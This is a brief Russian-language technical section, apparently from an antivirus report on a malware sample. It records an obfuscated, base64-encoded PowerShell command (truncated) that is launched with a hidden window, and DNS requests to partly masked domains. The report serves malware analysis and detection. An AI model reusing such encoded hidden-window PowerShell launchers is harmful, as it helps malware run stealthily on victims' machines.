Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAGUAcwBwAG8AbgBzAGUAcgB2AGIAPQAnAHQAcgBhAG4AcwBtAGkAdAB0AGkAbgBnAHoAbABuACcAOwAkAEwAYQByAGkAbwB...
- DNS ASK te###.yegal.com.au
- DNS ASK ge#######inteligencia.com.br
- DNS ASK ge###iana.com
- DNS ASK be####xologist.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAGUAcwBwAG8AbgBzAGUAcgB2AGIAPQAnAHQAcgBhAG4AcwBtAGkAdAB0AGkAbgBnAHoAbABuACcAOwAkAEwAYQByAGkAbwB...' (со скрытым окном)